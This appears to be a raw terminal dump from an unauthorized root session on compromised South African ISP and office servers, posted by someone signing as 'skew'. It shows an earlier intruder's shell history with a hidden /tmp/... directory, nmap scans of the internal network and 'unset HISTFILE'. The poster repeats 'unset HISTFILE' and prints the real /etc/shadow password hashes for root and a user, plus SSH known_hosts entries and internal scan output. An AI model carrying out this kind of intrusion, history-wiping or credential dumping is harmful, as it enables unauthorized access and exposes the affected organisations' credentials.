tcpdump -ni eth0 865 tail -f /var/log/kernel/ 866 tail -f /var/log/syslog 867 tail -f /var/log/messages 868 exit 869 locate msnt 870 cd /etc/squid/ 871 ll 872 vi msntauth.conf 873 /etc/init.d/named status 874 /etc/init.d/named restart 875 ifcconfig 876 iconfig 877 ifconfig 878 tail -f /var/log/messages 879 clear 880 tail -f /var/log/messages 881 vi /etc/shorewall/rules 882 tail -f /var/log/messages 883 ssh knysna.compumail.co.za 884 ssh plet.compumail.co.za 885 ping plet.copmumail.co.za 886 ping www.mweb.co.za 887 ssh plet.compumail.co.za 888 ping plet.compumail.co.za 889 vi /etc/shorewall/rules 890 exit 891 tail -f /var/log/messages 892 telnet plet.compumail.co.za 110 893 vi /etc/shorewall/rules 894 tail -f /var/log/messages 895 dmesg -c 896 clear 897 tail -f /var/log/messages 898 /etc/init.d/shorewall stop 899 /etc/init.d/shorewall start 900 tail -f /var/log/messages 901 vi /etc/sysctl.conf 902 vi /etc/shorewall/masq 903 ifconfig 904 vi /etc/shorewall/masq 905 ifconfig 906 vi /etc/shorewall/masq 907 cd /etc/shorewall/ 908 shorewall restart 909 tail -f /var/log/messages 910 passwd joe 911 tail -f /var/log/messages 912 vi masq 913 shorewall restart 914 exiyt 915 eexit 916 exit 917 ifconfig 918 netstat -rn 919 cd /etc/shorewall/ 920 vi masq 921 vi policy 922 vi interfaces 923 vi policy 924 vi rules 925 shorewall restart 926 dmesg -c 927 ifconfig 928 vi /etc/sysctl.conf 929 w 930 uname -a 931 cat /etc/*-release 932 w 933 ls 934 df -h 935 cat .bash_history 936 w 937 irssi 938 BitchX 939 cd /tmp 940 mkdir ... 941 chmod 700 ... 942 cd ... 943 ls 944 wget http://irssi.org/files/irssi-0.8.9.tar.gz 945 ftp ftp.irssi.org 946 exit 947 cd /tmp/... 948 ls 949 tar xzf * 950 cd * 951 ls 952 ./configure && make && make install 953 irssi --help 954 irssi -v 955 opensls 956 openssl 957 ./configure --help | grep ssl 958 grep ssl * 959 cd .. 960 ls 961 ifconfig 962 irssi ######## WHAT THE FUCK!? ############### 963 adduser talon 964 passwd talon 965 su talon 966 userdel talon 967 userdel -r talon 968 rm -rf /home/talon ######## WHAT THE FUCK!? ############### 969 ls 970 rm -rf * 971 w 972 cat ~/.ssh/known_hosts 973 ifconfig 974 nmap 975 ls 976 locate nmap 977 cat /etc/shadow 978 w 979 ls 980 exit 981 cd /tmp/... 982 ls 983 tar xzf * 984 cd * 985 ls 986 clear 987 ./configure && make && make install 988 cd .. 989 rm -rf * 990 nmap 991 clear 992 nmap -sP 192.168.0.1/24 993 clear 994 nmap -sS -sV -p 22 -P0 192.168.0.1/24 995 clear 996 nmap -sS -sV -P0 192.168.0.1/24 -oN nmap.log 997 clear 998 w 999 ls 1000 exit 1001 unset HISTFILE 1002 w 1003 ls -al 1004 history [root@histofw root]# [root@histofw root]# [root@histofw root]# [root@histofw root]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1580 472 ? S 2004 0:03 init [3] root 2 0.0 0.0 0 0 ? SW 2004 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? SW 2004 0:00 [migration/1] root 5 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/1] root 6 0.0 0.0 0 0 ? SW< 2004 0:00 [events/0] root 7 0.0 0.0 0 0 ? SW< 2004 0:00 [events/1] root 8 0.0 0.0 0 0 ? SW< 2004 2:40 [kblockd/0] root 9 0.0 0.0 0 0 ? SW< 2004 2:38 [kblockd/1] root 10 0.0 0.0 0 0 ? SW 2004 0:00 [kirqd] root 13 0.0 0.0 0 0 ? SW 2004 4:06 [kswapd0] root 14 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/0] root 15 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/1] root 17 0.0 0.0 0 0 ? SW 2004 0:00 [kseriod] root 25 0.0 0.0 0 0 ? SW 2004 0:47 [kjournald] root 115 0.0 0.3 2040 936 ? S 2004 0:01 devfsd /dev root 205 0.0 0.0 0 0 ? SW 2004 0:00 [khubd] root 1936 0.0 0.0 1656 236 ? S 2004 0:00 /sbin/ifplugd -w root 2010 0.0 0.1 1656 292 ? S 2004 0:00 /sbin/ifplugd -w root 2086 0.0 0.1 1644 412 ? S 2004 0:13 syslogd -m 0 -a / root 2094 0.0 0.1 2604 304 ? S 2004 0:05 klogd -2 daemon 2126 0.0 0.1 1620 276 ? S 2004 0:00 /usr/sbin/atd root 2180 0.0 1.0 2664 2664 ? SL 2004 0:01 ntpd -A root 2219 0.0 0.1 2172 508 ? S 2004 0:00 xinetd -stayalive root 2287 0.0 0.1 1632 256 ? S 2004 0:01 crond root 2307 0.0 0.0 2240 192 ? S 2004 0:00 /usr/sbin/fwlogwa root 2357 0.0 0.0 5484 244 ? S 2004 0:00 squid -D squid 2359 0.0 23.8 89264 60496 ? S 2004 22:12 (squid) -D squid 2369 0.0 0.0 1424 36 ? S 2004 0:00 (unlinkd) squid 2440 0.0 0.0 2400 160 ? S 2004 1:39 diskd 2415616 241 root 2518 0.0 0.7 11332 2028 ? S 2004 0:03 httpd2 -f /etc/ht nobody 2609 0.0 0.1 1904 492 ? S 2004 0:01 /usr/local/bin/no root 2615 0.0 0.0 1576 128 tty1 S 2004 0:00 /sbin/mingetty tt root 2616 0.0 0.1 1576 308 tty2 S 2004 0:00 /sbin/mingetty tt root 2617 0.0 0.0 1576 124 tty3 S 2004 0:00 /sbin/mingetty tt root 2618 0.0 0.0 1576 124 tty4 S 2004 0:00 /sbin/mingetty tt root 2619 0.0 0.0 1576 120 tty5 S 2004 0:00 /sbin/mingetty tt root 2620 0.0 0.0 1576 136 tty6 S 2004 0:00 /sbin/mingetty tt root 20328 0.0 0.2 4032 516 ? S Jun01 0:00 /usr/bin/perl /us apache 20381 0.0 1.2 11412 3116 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20382 0.0 1.1 11560 2944 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20383 0.0 1.5 11560 3816 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20384 0.0 0.8 11412 2188 ? S Jun01 0:00 httpd2 -f /etc/ht apache 20385 0.0 0.7 11412 1976 ? S Jun01 0:00 httpd2 -f /etc/ht root 1968 0.0 0.0 0 0 ? SW Jun06 0:00 [pdflush] named 9497 0.0 1.2 38792 3176 ? S Jun07 0:00 named -u named squid 17543 0.0 0.2 2104 616 ? S Jun12 0:00 (msnt_auth) squid 17547 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth) squid 17549 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth) squid 17550 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth) squid 17551 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth) apache 7468 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht apache 7469 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht apache 7470 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht root 20821 0.0 0.0 0 0 ? SW 04:36 0:00 [pdflush] root 27630 0.0 0.5 3336 1424 ? S 05:43 0:00 /usr/sbin/sshd root 27946 0.0 0.6 6052 1712 ? S 07:30 0:00 sshd: root@pts/0 root 27948 0.0 0.6 2780 1624 pts0 S 07:30 0:00 -bash root 28001 0.0 0.3 2424 784 pts0 R 07:36 0:00 ps aux [root@histofw root]# ls -al //home/ total 12 drwxr-xr-x 3 root root 4096 Jun 12 05:27 ./ drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../ drwx--x--x 3 joe joe 4096 Jun 10 13:18 joe/ [root@histofw root]# host Usage: host [-aCdlrTwv] [-c class] [-n] [-N ndots] [-t type] [-W time] [-R number] hostname [server] -a is equivalent to -v -t * -c specifies query class for non-IN data -C compares SOA records on authoritative nameservers -d is equivalent to -v -l lists all hosts in a domain, using AXFR -i Use the old IN6.INT form of IPv6 reverse lookup -N changes the number of dots allowed before root lookup is done -r disables recursive processing -R specifies number of retries for UDP packets -t specifies the query type -T enables TCP/IP mode -v enables verbose output -F Don't get next server when the first one got a SERVFAIL -w specifies to wait forever for a reply -W specifies how long to wait for a reply [root@histofw root]# hostname histofw.office.histologic.co.za [root@histofw root]# cat /root/.ssh/known_hosts knysna.compumail.co.za,196.15.249.203 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzIEVgzYxi0gw7M8wAmcNVKU3OedR13O+Bwq7EAJr2FznpiLi2xlRA3VMjdzphZCItWIR0gd48haQgYM8km7DSYkeOTnjBrD4VaRKdJf9ifdXPMVsdiKqhps1qYDn3futnYb/EcVOywHc+KqtxqY6gZT0XP8S+MOHfVqRW+ZWUA8= 196.7.8.54 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA93RWm8edFeHPLLNTH4NOz9QqvyvIjzWP9FcJbO1H6egi+Tp4HBHqENX2vzaKIzMRjQvcDiIcQReAaXxN+1uvgj2EGYT5xIyEj+OzlykvNLoBoYvPaGw6t/b4rK5SKCAKmABOaFUowLr/WyY3js3oaXX74Fmkc+tDN70Pbw8fPbs= 196.15.249.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6dGqZ8KfL4m3cxsAHQ3UnkRnWnNarGzSg/kGiRr00bdw8+N1NAl3j1efvXPHuI1TFgiNtVHEwz4hnN19F6pHVmKT/YIk/rN8cooQo/df0pk7k24mfrdwRyrV8K/xIGnXoEy4qPfe3hFl9TB5LdOPgMsy8WaYafJsF3yoZR+/9Ns= 196.25.45.214 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyUnEgWb1cXlMwr994ml+cCjbVDvQ8mqG6kfRBNTSPIazyD40FrYTt5lxp6eihjRCdMhyXbkZ/AH5C7/utzD2p0xcF+/h0mM0sYFQS+laQidFU66G7AT9jZCty+tcGBwYIZZOq6ZgurSB4d20e5BpA2SquiJmBEgahB3LT6axtHE= plet.compumail.co.za,196.15.249.204 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs= 127.0.0.1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM= [root@histofw root]# ls -al /tmp/.../ total 16 drwx------ 2 root root 4096 Jun 12 06:03 ./ drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../ -rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log [root@histofw root]# cat /tmp/.../nmap.log # nmap 3.81 scan initiated Sun Jun 12 06:03:16 2005 as: nmap -sS -sV -P0 -oN nmap.log 192.168.0.1/24 All 1663 scanned ports on 192.168.0.0 are: filtered All 1663 scanned ports on server1.office.histologic.co.za (192.168.0.1) are: filtered MAC Address: 00:D0:B7:B7:AE:1B (Intel) All 1663 scanned ports on 192.168.0.2 are: filtered All 1663 scanned ports on 192.168.0.3 are: filtered All 1663 scanned ports on 192.168.0.4 are: filtered All 1663 scanned ports on 192.168.0.5 are: filtered All 1663 scanned ports on 192.168.0.6 are: filtered All 1663 scanned ports on 192.168.0.7 are: filtered All 1663 scanned ports on 192.168.0.8 are: filtered All 1663 scanned ports on 192.168.0.9 are: filtered Interesting ports on histofw.office.histologic.co.za (192.168.0.10): (The 1657 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.6.1p2 (protocol 1.99) 53/tcp open domain ISC Bind 9.2.3 80/tcp open http Apache Advanced Extranet Server httpd 2.0.48 110/tcp open pop3 UW Imap pop3 server 2003.83mdk 443/tcp open ssl/http Apache Advanced Extranet Server httpd 2.0.48 3128/tcp open http-proxy Squid webproxy 2.5.STABLE4 All 1663 scanned ports on 192.168.0.11 are: filtered All 1663 scanned ports on 192.168.0.12 are: filtered All 1663 scanned ports on 192.168.0.13 are: filtered All 1663 scanned ports on 192.168.0.14 are: filtered All 1663 scanned ports on 192.168.0.15 are: filtered All 1663 scanned ports on 192.168.0.16 are: filtered All 1663 scanned ports on 192.168.0.17 are: filtered All 1663 scanned ports on 192.168.0.18 are: filtered All 1663 scanned ports on 192.168.0.19 are: filtered All 1663 scanned ports on 192.168.0.20 are: filtered All 1663 scanned ports on 192.168.0.21 are: filtered All 1663 scanned ports on 192.168.0.22 are: filtered All 1663 scanned ports on 192.168.0.23 are: filtered All 1663 scanned ports on 192.168.0.24 are: filtered All 1663 scanned ports on 192.168.0.25 are: filtered All 1663 scanned ports on 192.168.0.26 are: filtered All 1663 scanned ports on 192.168.0.27 are: filtered All 1663 scanned ports on 192.168.0.28 are: filtered All 1663 scanned ports on 192.168.0.29 are: filtered All 1663 scanned ports on 192.168.0.30 are: filtered All 1663 scanned ports on 192.168.0.31 are: filtered All 1663 scanned ports on 192.168.0.32 are: filtered All 1663 scanned ports on 192.168.0.33 are: filtered All 1663 scanned ports on 192.168.0.34 are: filtered All 1663 scanned ports on 192.168.0.35 are: filtered All 1663 scanned ports on 192.168.0.36 are: filtered All 1663 scanned ports on 192.168.0.37 are: filtered All 1663 scanned ports on 192.168.0.38 are: filtered All 1663 scanned ports on 192.168.0.39 are: filtered All 1663 scanned ports on 192.168.0.40 are: filtered All 1663 scanned ports on 192.168.0.41 are: filtered All 1663 scanned ports on 192.168.0.42 are: filtered All 1663 scanned ports on 192.168.0.43 are: filtered All 1663 scanned ports on 192.168.0.44 are: filtered All 1663 scanned ports on 192.168.0.45 are: filtered All 1663 scanned ports on 192.168.0.46 are: filtered MAC Address: 00:0F:20:23:0E:30 (Hewlett Packard) All 1663 scanned ports on 192.168.0.47 are: filtered All 1663 scanned ports on 192.168.0.48 are: filtered All 1663 scanned ports on 192.168.0.49 are: filtered All 1663 scanned ports on 192.168.0.50 are: filtered All 1663 scanned ports on 192.168.0.51 are: filtered All 1663 scanned ports on 192.168.0.52 are: filtered All 1663 scanned ports on 192.168.0.53 are: filtered All 1663 scanned ports on 192.168.0.54 are: filtered All 1663 scanned ports on 192.168.0.55 are: filtered All 1663 scanned ports on 192.168.0.56 are: filtered All 1663 scanned ports on 192.168.0.57 are: filtered All 1663 scanned ports on 192.168.0.58 are: filtered All 1663 scanned ports on 192.168.0.59 are: filtered All 1663 scanned ports on 192.168.0.60 are: filtered All 1663 scanned ports on 192.168.0.61 are: filtered All 1663 scanned ports on 192.168.0.62 are: filtered All 1663 scanned ports on 192.168.0.63 are: filtered All 1663 scanned ports on 192.168.0.64 are: filtered All 1663 scanned ports on 192.168.0.65 are: filtered All 1663 scanned ports on 192.168.0.66 are: filtered All 1663 scanned ports on 192.168.0.67 are: filtered All 1663 scanned ports on 192.168.0.68 are: filtered All 1663 scanned ports on 192.168.0.69 are: filtered All 1663 scanned ports on 192.168.0.70 are: filtered All 1663 scanned ports on 192.168.0.71 are: filtered All 1663 scanned ports on 192.168.0.72 are: filtered All 1663 scanned ports on 192.168.0.73 are: filtered All 1663 scanned ports on 192.168.0.74 are: filtered All 1663 scanned ports on 192.168.0.75 are: filtered All 1663 scanned ports on 192.168.0.76 are: filtered All 1663 scanned ports on 192.168.0.77 are: filtered All 1663 scanned ports on 192.168.0.78 are: filtered All 1663 scanned ports on 192.168.0.79 are: filtered All 1663 scanned ports on 192.168.0.80 are: filtered All 1663 scanned ports on 192.168.0.81 are: filtered All 1663 scanned ports on 192.168.0.82 are: filtered All 1663 scanned ports on 192.168.0.83 are: filtered All 1663 scanned ports on 192.168.0.84 are: filtered All 1663 scanned ports on 192.168.0.85 are: filtered All 1663 scanned ports on 192.168.0.86 are: filtered All 1663 scanned ports on 192.168.0.87 are: filtered All 1663 scanned ports on 192.168.0.88 are: filtered All 1663 scanned ports on 192.168.0.89 are: filtered All 1663 scanned ports on 192.168.0.90 are: filtered [root@histofw root]# ls -al /var/tmp/ total 12 drwxrwxrwt 3 root root 4096 Jun 14 04:07 ./ drwxr-xr-x 21 root root 4096 May 12 2004 ../ drwx------ 4 root root 4096 May 13 2004 kdecache-root/ [root@histofw run]# [root@histofw run]# cd /home/joe/ [root@histofw joe]# ls -al total 36 drwx--x--x 3 joe joe 4096 Jun 10 13:18 ./ drwxr-xr-x 3 root root 4096 Jun 12 05:27 ../ -rw------- 1 joe joe 3 Jun 10 13:18 .bash_history -rw-r--r-- 1 joe joe 24 May 12 2004 .bash_logout -rw-r--r-- 1 joe joe 191 May 12 2004 .bash_profile -rw-r--r-- 1 joe joe 124 May 12 2004 .bashrc -rw-r--r-- 1 joe joe 141 May 12 2004 .mailcap -rw-r--r-- 1 joe joe 3729 May 12 2004 .screenrc drwx------ 2 joe joe 4096 May 12 2004 tmp/ [root@histofw joe]# cat .bash_history su [root@histofw joe]# cat /etc/shadow root:$1$HPUKC/y.$hRGN2fb/eqR/yW1QrKbPi1:12751:0:99999:7::: bin:*:12550:0:99999:7::: daemon:*:12550:0:99999:7::: adm:*:12550:0:99999:7::: lp:*:12550:0:99999:7::: sync:*:12550:0:99999:7::: shutdown:*:12550:0:99999:7::: halt:*:12550:0:99999:7::: mail:*:12550:0:99999:7::: news:*:12550:0:99999:7::: uucp:*:12550:0:99999:7::: operator:*:12550:0:99999:7::: games:*:12550:0:99999:7::: nobody:*:12550:0:99999:7::: rpm:!!:12550:0:99999:7::: vcsa:!!:12550:0:99999:7::: rpc:!!:12550:0:99999:7::: xfs:!!:12550:0:99999:7::: postfix:!!:12550:0:99999:7::: apache:!!:12550:0:99999:7::: sshd:!!:12550:0:99999:7::: ftp:!!:12550:0:99999:7::: squid:!!:12550:0:99999:7::: joe:$1$YXpZu0Us$UQvcnUa9dAzRd58GE4u1O/:12944:0:99999:7::: named:!!:12550:0:99999:7::: ------------------------------------ skew @ knysna: absolutely nothing here just some lame hacking attempts it seems. ------------------------------------ login as: root root@knysna.compumail.co.za's password: Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no [root@knysna root]# w 06:49:22 up 63 days, 14:35, 2 users, load average: 0.09, 0.03, 0.00 USER TTY LOGIN@ IDLE JCPU PCPU WHAT root vc/1 01Jun05 5days 0.03s 0.03s -bash root pts/0 Mon09 18:39m 0.03s 0.03s -bash [root@knysna root]# uname unset HISTFILE [root@knysna root]# uname -a ; cat /etc/issue Linux knysna 2.6.3-7mdk-p3-smp-64GB #1 SMP Wed Mar 17 15:34:39 CET 2004 i686 unknown unknown GNU/Linux Mandrake Linux release 10.0 (Official) for i586 Kernel 2.6.3-7mdk-p3-smp-64GB on a Dual-processor i686 / \l [root@knysna root]# history 4 dig www.anchorrand.com 5 exit 6 bwm 7 exit 8 bwm 9 tcpdump -ni wp7aft 10 exit 11 bwm 12 wanrouter status 13 bwm 14 exit 15 ping www.logisticor.com 16 dig www.logisticor.com @196.25.1.1 17 dig www.logisticor.com @196.25.1.11 18 dig www.logisticor.com @induna.saix.net 19 dig www.logisticor.com @igubu.saix.net 20 /etc/init.d/named 21 /etc/init.d/named restart 22 dig www.logisticor.com @196.15.249.203 23 dig www.logisticor.com @196.15.249.204 24 exit 25 dig www.logisticor.com @196.15.249.204 26 dig www.logisticor.com @196.15.249.203 27 dig www.logisticor.com @192.168.20.2 28 dig logisticor.com @192.168.20.2 29 dig www.logisticor.com @192.168.20.2 30 dig www.logisticor.com @196.15.249.204 31 dig www.logisticor.com @induna.saix.net 32 exit 33 bwm 34 exit 35 dmesg | grep 196.25.45.221 36 dmesg -c 37 clear 38 tail -f /var/log/messages 39 tail -f /var/log/messages | grep 196.25.45.221 40 route 41 route add -net 196.25.45.220 netmask 25.255.255.252 gw 196.15.249.205 42 route add -net 196.25.45.220 netmask 255.255.255.252 gw 196.15.249.205 43 route 44 exit 45 cat /etc/services | grep https 46 exit 47 vi /etc/in 48 vi /var/named/ 49 vi /var/named/logisticor.com 50 rndc reload 51 dig ftp.logisticor.com 52 ping ftp.logisticor.com 53 vi /var/named/logisticor.com 54 rndc reload 55 ping ftp.logisticor.com 56 dig ftp.logisticor.com 57 vi /var/named/logisticor.com 58 rndc reload 59 dig ftp.logisticor.com 60 ping ftp.logisticor.com 61 exit 62 dig www.logisticor.com 63 cd /var/named/ 64 ls 65 vi logisticor.com 66 rcdc reload 67 rndc reload 68 dig www.logisticor.com\ 69 dig www.logisticor.com 70 /etc/init.d/named restart 71 dig www.logisticor.com 72 vi namerd 73 vi named. 74 vi logisticor.com 75 dig www.logisticor.com 76 cd /var/named/ 77 vi compumail.co.za 78 ll 79 dig alltransportneeds.co.za 80 dig atn.co.za 81 dig atn.com 82 exit 83 vi /var/named/parktonian.co.za 84 rndc reload parktonian.co.za 85 dig www.parktonian.co.za 86 exit 87 bwm 88 exit 89 cd /var/named/ 90 cat gea-westfalia.co.za 91 vi gea-westfalia.co.za 92 rncd reload gea-westfalia.co.za 93 rndc reload gea-westfalia.co.za 94 dig gea-westfalia.co.za 95 vi gea-westfalia.co.za 96 exit 97 cd /var/named/ 98 ls 99 vi logisticor.com 100 rndc reload 101 dig www.logisticor.com 102 ping www.logisticor.com 103 dig www.logisticor.com 104 vi logisticor.com 105 /etc/init.d/named resatrt 106 /etc/init.d/named resatart 107 /etc/init.d/named restart 108 dig www.logisticor.com\ 109 dig www.logisticor.com 110 dig logisticor.com 111 dig www.logisticor.com 112 ping web01.compumail.co.za 113 vi logisticor.com 114 /etc/init.d/named resatart 115 /etc/init.d/named restart 116 rndc reload 117 dig www.logisticor.com 118 exit 119 cd /etc/sysconfig/network-scripts/ 120 ll 121 vi ifcfg-eth0 122 ll 123 ifconfig 124 exit 125 ifconfig | more 126 exit 127 bwm 128 tcpdump -ni wp7aft 129 tcpdump -i wp7aft 130 exit 131 bwm 132 ssh 196.15.249.254 133 bwm 134 dig mail.tiscpty.com 135 cd /var/named/ 136 vi khuphukani.co.za 137 passwd kh_info 138 vi khuphukani.co.za 139 rndc reload 140 /etc/init.d/named resatrt 141 /etc/init.d/named restart 142 exit 143 ssh joe@165.146.35.51 144 ssh parktonian.no-ip.info 145 exit 146 cd /var/named/ 147 vi geospace.co.za 148 rndc reload geospace.co.za 149 exit 150 ifconfig 151 ssh joe@196.25.45.246 152 ifconfig 153 bwm 154 ssh 196.25.45.234 155 ssh 196.25.29.178 156 grep /var/log/httpd/access_log 157 more /var/log/httpd/access_log 158 more /var/log/httpd/error_log 159 exit 160 vi /etc/named.conf 161 exit 162 cd /var/named/ 163 vi ibe.co.za 164 cat candnhose.com 165 vi ibe.co.za 166 cat candnhose.com 167 vi ibe.co.za 168 rndc reload ibe.co.za 169 exit 170 bwm 171 exit 172 vi /var/named/delvenco.co.za 173 rndc reload delvenco.co.za 174 dig mobile.delvenco.co.za 175 xit 176 exit 177 bwm 178 ifconfig wp11aft 179 ssh joe@196.25.45.246 180 exit 181 ssh mail.delvenco.co.za 182 ssh mobile.delvenco.co.za 183 exit 184 vi /var/named/delvenco.co.za 185 telnet mobile.delvenco.co.za 25 186 rndc reload 187 rndc reload delvenco.co.za 188 cd /var/named/ 189 vi onestar.co.za 190 vi liberne.co.za 191 vi webz-r-us.co.za 192 rndc reload onestar.co.za 193 rndc reload liberne.co.za 194 rndc reload webz-r-us.co.za 195 dig onestar.co.za mx 196 dig liberne.co.za mx 197 ssh 196.15.249.204 198 exit 199 ssh plet.compumail.co.za 200 exit 201 ssh berner.no-ip.info 202 ssh joe@berner.no-ip.info 203 cat /var/named/logisticor.com 204 vi /var/named/logisticor.com 205 rndc reload logisticor.com 206 ll /var/named/ 207 exit 208 ssh lin02.compumail.co.za 209 exit 210 ssh 196.25.45.234 211 ssh plet 212 bwm 213 ssh plet.compumail.co.za 214 exit 215 ll 216 exit 217 vi /etc/named.conf 218 rm -fr /var/named/pakmatic.co.za 219 rndc reload 220 exit 221 ssh parktonian.no-ip.info 222 parktonian.no-ip.info 223 ping parktonian.no-ip.info 224 ssh parktonian.no-ip.info 225 exit 226 bwm 227 exit 228 vi /var/ 229 cd /var 230 ls 231 cd .. 232 locate named 233 cd /var/man 234 cd /var/named/ 235 ls 236 vi tiscpty.com 237 rndc reload tiscpty.com 238 dig tiscpty.com mx 239 dig mail.tiscpty.com 240 dig mail.tiscpty.com @196.15.249.203 241 dig mail.tiscpty.com @196.15.249.204 242 dig mail.tiscpty.com @196.15.249.203 243 dig mail.tiscpty.com @196.15.249.204 244 dig mail.tiscpty.com @196.15.249.203 245 /etc/init.d/named restart 246 dig mail.tiscpty.com @196.15.249.203 247 dig mail.tiscpty.com @196.15.249.204 248 dig mail.tiscpty.com 249 /etc/init.d/named start 250 /etc/init.d/named restart 251 dig mail.tiscpty.com 252 dig mail.tiscpty.com @196.15.249.204 253 dig mail.tiscpty.com @196.15.249.203 254 ifconfig 255 dig mail.tiscpty.com @196.15.249.203 256 vi /var/named/ 257 vi /var/named/tiscpty.com 258 rndc reload 259 dig mail.tiscpty.com @196.15.249.204 260 dig mail.tiscpty.com @196.15.249.203 261 vi tiscpty.com 262 vi acetron.co.za 263 vi tiscpty.com 264 rndc reload 265 dig mail.tiscpty.com @196.15.249.203 266 dig tiscpty.com @196.15.249.203 267 dig tiscpty.com mx @196.15.249.203 268 dig tiscpty.com mx @196.15.249.204 269 dig tiscpty.com @196.15.249.204 270 dig tiscpty.com @196.15.249.203 271 vi tiscpty 272 vi tiscpty.com 273 vi acetron.co.za 274 vi tiscpty.com 275 rndc reload 276 dig tiscpty.com @196.15.249.203 277 dig tiscpty.com mx 278 dig mail.tiscpty.com 279 vi thehouses.co.za 280 exit 281 cd /var/named/ 282 ls 283 vi nestlife.co.za 284 rndc reload 285 vi nestlife.co.za 286 vi nestlife.co.za 287 vi knowres.co.za 288 vi nestlife.co.za 289 vi knowres.co.za 290 vi nestlife.co.za 291 rndc reload 292 cd /var/named/ 293 vi nestlife.co.za 294 dig nestlife.co.za mx 295 dig nestlife.co.za 296 dig mail.nestlife.co.za 297 dig www.nestlife.co.za 298 vi nestlife.co.za 299 dig www.nestlife.co.za 300 vi nestlife.co.za 301 rndc reload 302 dig pop.netl 303 dig pop.nestlife.co.za 304 ssh plet.compumail.co.za 305 ls 306 ifconfig 307 ssh 196.25.45.254 308 wbm 309 bwm 310 exit 311 vi /var/named/geospace.co.za 312 rndc reload geospace.co.za 313 vi /var/named/geospace.co.za 314 rndc reload geospace.co.za 315 dig geospace.co.za 316 dig www.geospace.co.za 317 dig geospace.co.za 318 vi /var/named/geospace.co.za 319 rndc reload geospace.co.za 320 dig geospace.co.za 321 view /var/log/mail/info 322 view /var/log/messages 323 vi /var/named/geospace.co.za 324 rndc reload geospace.co.za 325 view /var/log/messages 326 tail -f /var/log/messages 327 vi /var/named/motocomp.co.za 328 tail -f /var/log/messages 329 dig geospace.co.za @co.za 330 dig geospace.co.za ns @co.za 331 exit 332 dig geospace.co.za 333 rndc reload 334 dig geospace.co.za 335 vi /var/named/geospace.co.za 336 rndc reload 337 vi /var/named/nestlife.co.za 338 rndc reload 339 vi /var/named/nestlife.co.za 340 rndc reload 341 cd /var/named/ 342 vi geospace. 343 vi geospace.co.za 344 rndc reload geospace.co.za 345 dig geospace.co.za 346 dig geospace.co.za @127.0.0.1 347 dig geospace.co.za 348 rndc reload 349 vi geospace.co.za 350 rndc reload 351 exit 352 tail -f /var/log/messages 353 exit 354 cd /var/named/ 355 ll geospace.co.za 356 vi geospace.aero 357 vi geospace.co.za 358 rndc reload geospace.co.za 359 di gwww.geospace.co.za 360 dig gwww.geospace.co.za 361 dig www.geospace.co.za 362 rndc reload 363 vi /var/named/geospace.co.za 364 rndc reload geospace.co.za 365 exit 366 tail -f /var/log/messages | grep 192.168.20.23 367 exit 368 mailconf 369 dig tiscpty.com mx 370 dig tiscpty.com mx @196.25.1.1 371 dig tiscpty.com mx @induna.saix.net 372 dig tiscpty.com mx @igubu.saix.net 373 dig mail.tiscpty.com 374 exit 375 dig lin02.lanlink.co.za mx 376 /etc/init.d/named 377 vi /var/named/tiscpty.com 378 dig lin02.compumail.co.za mx 379 dig plet.compumail.co.za mx 380 exit 381 dig stike.co.za mx 382 dig strike.co.za mx 383 dig mail.strike.co.za 384 telnet mail.strike.co.za 25 385 telnet mail.strike.co.za 25 386 quit 387 exit 388 bwm 389 tcpdump -ni eth0 390 bwm 391 ssh 196.25.29.178 392 exit 393 cd /var/named/ 394 vi compumail.co.za 395 vi lanlink.co.za 396 vi delvenco.co.za 397 vi onestar.co.za 398 dig compumail.co.za mx @127.0.0.1 399 exit 400 bwm 401 exit 402 bwm 403 exit 404 bwm 405 tcpdump -ni wp2aft src 165.146.147.111 406 tcpdump -ni wp2aft src 165.146.100.119 407 exit 408 cd /var/nm 409 cd /var/named/ 410 ls 411 vi tigertruck.co.za 412 vi sheffieldbeachaccommodation.co.za 413 vi tigertruck.co.za 414 vi sheffieldbeachaccommodation.co.za 415 vi sheffieldbeachholiday.co.za 416 vi sheffieldbeachaccommodation.co.za 417 vi sheffieldbeachholiday.co.za 418 vi tigertruck.co.za 419 vi sheffieldbeachholiday.co.za 420 vi sheffieldbeachaccommodation.co.za 421 vi sheffieldbeachholiday.co.za 422 locate Vhosts 423 vi /etc/httpd/conf/vhosts/Vhosts.conf 424 vi /etc/named.conf 425 rndc 